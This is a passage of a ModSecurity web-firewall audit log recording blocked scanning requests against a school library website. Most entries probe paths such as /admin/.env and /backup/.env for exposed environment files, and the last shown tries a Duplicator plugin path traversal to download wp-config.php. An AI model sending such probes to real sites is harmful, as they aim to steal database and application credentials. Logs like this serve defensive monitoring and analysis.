--ad801e04-B-- GET /login/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362326 --ad801e04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad801e04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196348358 841 (- - -) Stopwatch2: 1745578196348358 841; combined=329, p1=286, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad801e04-Z-- --29b49551-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAawAAAFc 103.236.140.4 42540 103.236.140.4 8181 --29b49551-B-- GET /api_v1/go/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268861 --29b49551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --29b49551-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196546751 684 (- - -) Stopwatch2: 1745578196546751 684; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29b49551-Z-- --3f27bf25-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAbAAAAFI 103.236.140.4 42544 103.236.140.4 8181 --3f27bf25-B-- GET /api_v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362329 --3f27bf25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f27bf25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196743662 682 (- - -) Stopwatch2: 1745578196743662 682; combined=259, p1=228, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f27bf25-Z-- --2697ce6d-A-- [25/Apr/2025:17:49:56 +0700] aAto1OXF4ZX3hX-IbN7h_gAAAJA 103.236.140.4 42548 103.236.140.4 8181 --2697ce6d-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268864 --2697ce6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2697ce6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196941636 702 (- - -) Stopwatch2: 1745578196941636 702; combined=278, p1=243, p2=0, p3=0, p4=0, p5=34, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2697ce6d-Z-- --e4466743-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7h_wAAAIw 103.236.140.4 42552 103.236.140.4 8181 --e4466743-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362332 --e4466743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4466743-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197138764 736 (- - -) Stopwatch2: 1745578197138764 736; combined=306, p1=280, p2=0, p3=0, p4=0, p5=26, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4466743-Z-- --49da7221-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAQAAAI4 103.236.140.4 42560 103.236.140.4 8181 --49da7221-B-- GET /v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268870 --49da7221-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49da7221-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197537841 664 (- - -) Stopwatch2: 1745578197537841 664; combined=314, p1=270, p2=0, p3=0, p4=0, p5=44, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49da7221-Z-- --896c9061-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAwAAAJg 103.236.140.4 42566 103.236.140.4 8181 --896c9061-B-- GET /v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268873 --896c9061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --896c9061-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197935866 659 (- - -) Stopwatch2: 1745578197935866 659; combined=323, p1=275, p2=0, p3=0, p4=0, p5=48, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --896c9061-Z-- --d1342f48-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBAAAAIo 103.236.140.4 42572 103.236.140.4 8181 --d1342f48-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362341 --d1342f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d1342f48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198133453 665 (- - -) Stopwatch2: 1745578198133453 665; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1342f48-Z-- --9ab04d5a-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBQAAAIY 103.236.140.4 42580 103.236.140.4 8181 --9ab04d5a-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362344 --9ab04d5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9ab04d5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198330921 683 (- - -) Stopwatch2: 1745578198330921 683; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab04d5a-Z-- --df85b562-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBgAAAIs 103.236.140.4 42584 103.236.140.4 8181 --df85b562-B-- GET /ci4/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268879 --df85b562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --df85b562-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198528235 846 (- - -) Stopwatch2: 1745578198528235 846; combined=333, p1=293, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df85b562-Z-- --db916752-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBwAAAII 103.236.140.4 42588 103.236.140.4 8181 --db916752-B-- GET /backup/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362347 --db916752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --db916752-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198725951 669 (- - -) Stopwatch2: 1745578198725951 669; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db916752-Z-- --b1330c72-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iCAAAAIc 103.236.140.4 42592 103.236.140.4 8181 --b1330c72-B-- GET /frontend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268882 --b1330c72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1330c72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198922904 687 (- - -) Stopwatch2: 1745578198922904 687; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1330c72-Z-- --dbf1d15c-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCQAAAIU 103.236.140.4 42596 103.236.140.4 8181 --dbf1d15c-B-- GET /old/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362350 --dbf1d15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dbf1d15c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199120372 896 (- - -) Stopwatch2: 1745578199120372 896; combined=342, p1=297, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf1d15c-Z-- --13748561-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCgAAAIk 103.236.140.4 42600 103.236.140.4 8181 --13748561-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268885 --13748561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13748561-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199319234 775 (- - -) Stopwatch2: 1745578199319234 775; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13748561-Z-- --232d3b70-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCwAAAJU 103.236.140.4 42608 103.236.140.4 8181 --232d3b70-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268888 --232d3b70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --232d3b70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199517057 693 (- - -) Stopwatch2: 1745578199517057 693; combined=280, p1=245, p2=0, p3=0, p4=0, p5=34, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232d3b70-Z-- --3e605c37-A-- [25/Apr/2025:17:49:59 +0700] aAto1-OdEP6frSVs8Cp41gAAABM 103.236.140.4 42612 103.236.140.4 8181 --3e605c37-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362356 --3e605c37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3e605c37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199715199 1141 (- - -) Stopwatch2: 1745578199715199 1141; combined=391, p1=342, p2=0, p3=0, p4=0, p5=49, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e605c37-Z-- --9cef0c06-A-- [25/Apr/2025:17:50:05 +0700] aAto3eOdEP6frSVs8Cp42gAAAAI 103.236.140.4 42686 103.236.140.4 8181 --9cef0c06-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362407 --9cef0c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cef0c06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 